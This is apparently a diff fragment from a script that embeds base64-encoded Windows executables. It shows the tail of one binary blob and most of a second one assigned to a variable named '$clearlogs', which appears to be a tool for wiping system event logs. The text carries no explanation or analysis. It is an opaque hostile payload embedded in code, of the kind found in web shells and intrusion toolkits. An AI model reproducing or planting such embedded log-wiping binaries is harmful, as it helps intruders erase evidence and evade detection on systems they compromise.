+b2NhbGVJbmZvVwAAS0VSTkVMMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAACYAAAAtTDI
+MOowIzE2MVYxcjGqMb0x4jEMMkMyVjIWM00zYDPmMx00MDSMNM40FzUoNZI1+DU0NkU2ZDagNrE2
+2TYmNzc3fDf3N/03Pjh3OIo4qDjhOPQ4MDmvOe45AToiOkk6gDqTOkU8WDx6PLM8xjzmPAI9Oj1N
+PXE9mz3SPeU9kD7YPus+DD9EP1c/jD/hPwAAACAAAPAAAAAAMDcwVjCRMLAwGjFJMWIxcDEcMioy
+fDKrMssy5zIRMy8z5TPwMww0OzRvNI40rzTONA01rTW4Ndw1AzYUNic2OTZVNmQ2jzagNr420zbv
+Nhk3Nzd5N4E3pzeyN8434TeTOKM4szjDONk47zj1OP44GjkqOTo5SjlaOXY5fDmFOaE5sTnBOdE5
+5zn9OQM6DDozOjk6SjpbOnU6jDqSOpg60DrgOvA6ADsWOyw7Mjs7O1c7Zzt3O4c7lzuzO7k7wjve
+O+47/jsOPCQ8OjxAPEk8ZTx1PIU8lTyuPMQ8yjzQPH89oT2sPb49ADAAAIgAAACzMLgw7jDzMDox
+PzGnMawxYDQQNSw1MTVcNWE1hjWiNac1CDYNNmU2gDaTNqA2uzbONts28jYRNyg3NTdMN1k3VDhZ
+OKw4sTjFOMo4+zgfOTI5lDmiOb051TkSO5g7rjvPO9s79jsGPBc8IzxbPJA8bD1zPYU92z0LPi8+
+PD5hPgBAAAB0AAAAUTC2MMAwVTH/MZMyzjLYMxk0gjScNKU0ojjAOPQ4Lzk8OWc5djm/Oc85/DkT
+Oh86LTr+Oik7OjsCPAw8GDwhPCw8OjxEPFk8bDx0PIo8oDy/PNc88zwCPRs9Kj04PTk+VD4IPyQ/
+QT9gPwAAAFAAAMQAAACRMJwwoTCuMLMwCjEYMR8xJTE4MUAxSTFSMWUxbDFxMX4xgzGeMakxDDIR
+MigyPTJDMkgyUzKCMocykTKbMrwywTLHMs0yMjNSM2szcDOCM4kzkTOZM6EzvDPxMxA0KjQxNEg0
+TzRWNHA0ojS4NL80xjTgNBI1MTU+NUQ1STV+NYY1mjWxNbg1yDXNNe419TUINic2RDZLNlI2cDZ3
+Noo2pjYiNz43uDfQN1s4rji4OK45uDlrOow/kT8AAABgAAB8AAAAHDEhMWwycTJsNHE0aDWANRY2
+KDZRNks3XDd4N7s30jeHOAQ5uDnQOVY6YDqZOiY7NjtqO3k7bjyMPJA8lDyYPJw8oDykPKg8rDyw
+PBQ9Jj1BPV09Zj17PYQ9lT2bPag9rj09Pkk+Vj5rPlY/aD+EP84/1T8AcAAAvAAAAK8wtjDoMIsx
+kjFWMvQyyTXmNf01UDbQN9Q32DfcN+A35DfoN+w38Df0N/g3/DcAOAQ4HDggOCQ4KDgsOGA4ZDho
+OGw4cDh0OHg4fDiAOIQ4iDiMOJA4lDiYOJw4oDgcOiI6STpdOpM6mjq5Ouk68zoMOyY7RztwO347
+tzu+O+U76zsEPBc8RzxUPFk8fzyOPKA8sTzSPPE8DT03PUU9bz2FPaQ92z1EPl4+MD84P5U/sD8A
+AACAAAAAAQAAijCQMLEwtzBmMYQxqjHdMfYxYTKLMpQymTKfMqoyDDMSM2szrzOSNLM09TT/NBA1
+IDUsNUo1mzXCNdg16TX5NQY2RjZrNrI28jYGNxQ3IjdaN3g3iDeaN7w32jfgN/83DDgROB84KDhO
+OFM4Wjh8OMI41TjfOOo49Dj/OAg5IjkpOUg5TDlQOVQ5WDl0OYE5hjmMOZE5kTqgOrU62TrxOvo6
+DTsaOyM7STtWO6I7sDvxOyQ8WTx4PIg8kDyuPMc81jzcPOg8+jwXPR09JT0tPTI9Pj1+PZE9nD2h
+PcI94j39PRw+IT6cPqE+vj4TP3E/tz/OP94/AAAAkAAAlAAAABkwQjBKMKgwuTDSMPIwATEQMVgx
+aDGIMbEx9jEPMlcyfjKZMscy0zITMxgzHDMgMyQzeTOsM7AztDO4M7wzHzQ5NEk0hDSONOg0ADWY
+NU82ejaWNqQ3GDgfOBU5tjnGOew59zn9OUk6eDt8O4A7hDuIO8I7DTwTPCE8Mjw6PD48QzxRPGI8
+eDyGPAAAAKAAAOAAAAA5M0AzSzNfM3MzhzOZM6cztTPJM88z1jPeM+Uz9TMHNBg0HjQmNCw0NTQ6
+NEM0UDRZNGE0bzR9NI40lDSaNKo0sjTINNs05DQHNRA1KDU3NUE1ojXuNfc1AjYONhQ2IzY0Njs2
+QzZMNlI2XDZgNmY2dDaFNp02PTivOLs4wjjKOFU5XTl+OSA6ajpwOnY6fjqNOpQ6mzqrOgw7EjsY
+Ox07Kzs7O0A7JjxCPFI8cDyhPMM8/DwNPSE9Qj5RPlo+eT6GPp4+pz7APsU+8D4GPyE/YD96P68/
++j8AsAAA7AAAABgwOTClMLYwvjDMMN4w6DDyMAgxDjE1MVAxbjG1Md0x/zFkMnYyfjKbMqMyvjLD
+MtYy+jIRMygzVDNqM5cznjOkM68ztTO9M8YzzjPTM9sz4DPyM/wzFDRgNGY0gDSTNKY0sDS9Nd81
+ZjYvN1k3aTeKN7E34jfxNxI4KjgvOFQ4azh/OLA4zDj0OBI5ITlCOVo5XzmEOZs5rznnOQo6NTpe
+OqU6rjoAO0k7UDtlO2s7lTubO6U7qzu1O7s7RjxLPGw8cjzYPNw84DzkPOg87DzwPPQ8JT1lPfU9
+Hz41PlQ+iz4AAADAAAAUAAAAgjCpMAAxCTFpMQAAAOAAAIAAAAAAMQQxLDEwMTwxQDFQMVgxXDFk
+MWgxdDF4MQg1EDUUNSA1KDUsNXw8gDyUPJg8oDy8PNw87Dz0PBQ9JD0wPTg9aD18PYg9kD2sPbQ9
+0D3cPeQ98D34PRQ+MD48PkQ+UD5YPnQ+kD6cPqQ+sD64PtQ+8D78PgQ/AAAA8AAAWAAAAAQwEDAU
+MCAwODBIMCw0MDQ4NFA00DXYNaw4xDjkOPQ4BDmIOZg5oDmkOag5rDmwObQ5uDm8OcA5xDnIOcw5
+0DnUOdg53DkwOzQ7YDtkOwAAAAABACACAAAcMCQwLDA0MDwwRDBMMFQwXDBkMGwwdDB8MIQwjDCU
+MJwwpDD4MAAxCDEQMRgxIDEoMTAxODFAMUgxUDFYMWAxaDFwMXgxgDGIMZAxmDGgMagxsDG4McAx
+yDHQMdgx4DHoMfAx+DEAMggyEDIYMiAyKDIwMjgyQDJIMlAyWDJgMmgycDJ4MoAyiDKQMpgyoDKo
+MrAyuDLAMsgy0DLYMuAy6DLwMvgyADMIMxAzGDMgMygzMDM4M0AzSDNQM1gzYDNoM3AzeDOAM4gz
+kDOYM6AzqDOwM7gzwDPIM9Az2DPgM+gz8DP4MwA0CDQQNBg0IDQoNDA0ODRANEg0UDRYNGA0aDRw
+NHg0gDSINJA0mDSgNKg0sDS4NMA0yDTQNNg04DToNPA0+DQANQg1EDUYNSA1KDUwNTg1QDVINVA1
+WDVgNWg1cDV4NYA1iDWQNZg1oDWoNbA1uDXANcg10DXYNeA16DXwNfg1ADYINhA2GDYgNig2MDY4
+NkA2SDZQNlg2YDZoNnA2eDaANog2kDaYNqA2qDawNrg2wDbwOPQ4+Dj8OAA5BDkwOTQ5ODk8OUA5
+RDlIOUw5UDlUOVg5XDlgOWQ5aDlsOXA5dDl4OXw5gDmEOYg5jDmQOZQ5mDmcOaA5pDmoOaw5sDm0
+Obg5vDnAOcQ5yDnMOdA51DnYOdw58Dn0Ofg5/DkAOgQ6CDoMOhA6FDogOuA65DoAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==";
+
+$clearlogs = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
+ZGUuDQ0KJAAAAAAAAAB12cLfMbisjDG4rIwxuKyM2aenjDC4rIyypKKMOrisjFOnv4w0uKyMMbit
+jB+4rIzZp6aMGrisjFJpY2gxuKyMAAAAAAAAAABQRQAATAEDAEe3XzwAAAAAAAAAAOAADwELAQYA
+AEAAAABAAAAAAAAADhYAAAAQAAAAUAAAAABAAAAQAAAAEAAABAAAAAAAAAAEAAAAAAAAAACQAAAA
+EAAAAAAAAAMAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJxUAAA8AAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAUAAAvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAA
+Bj8AAAAQAAAAQAAAABAAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAALAIAAAAUAAAABAAAABQAAAA
+AAAAAAAAAAAAAABAAABALmRhdGEAAADcIQAAAGAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAQAAAwAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFWaEBuQABo
+QGxAAP8VAFBAAIvwhfZ1UGh4YEAA6LAEAACDxASNRCQEVlZQaAAEAAD/FRBQQABQVmgAEwAA/xUU
+UEAAi0wkBFFodGBAAOh/BAAAi1QkDIPECFL/FVxQQABqAeiVAwAAagBW/xUEUEAAhcB1U2hUYEAA
+6FMEAACDxASNRCQEagBqAFBoAAQAAP8VEFBAAFBqAGgAEwAA/xUUUEAAi0wkBFFodGBAAOgfBAAA
+i1QkDIPECFL/FVxQQABqAeg1AwAAaDBgQADoAAQAAIPEBFb/FQhQQABeWcOQU1ZXaOxhQADo5QMA
+AGikYUAA6NsDAABoaGFAAOjRAwAAi0QkHIPEDDPbg/gCD4U1AQAAi0QkFL5gYUAAi3gEi8eKEIrK
+OhZ1HITJdBSKUAGKyjpWAXUOg8ACg8YChMl14DPA6wUbwIPY/4XAdSehVGFAAIsNWGFAAIsVXGFA
+AKNAbkAAiQ1EbkAAiRVIbkAA6bcAAAC+TGFAAIvHihCKyjoWdRyEyXQUilABiso6VgF1DoPAAoPG
+AoTJdeAzwOsFG8CD2P+FwHUkoUBhQACLDURhQACKFUhhQACjQG5AAIkNRG5AAIgVSG5AAOtfvjhh
+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
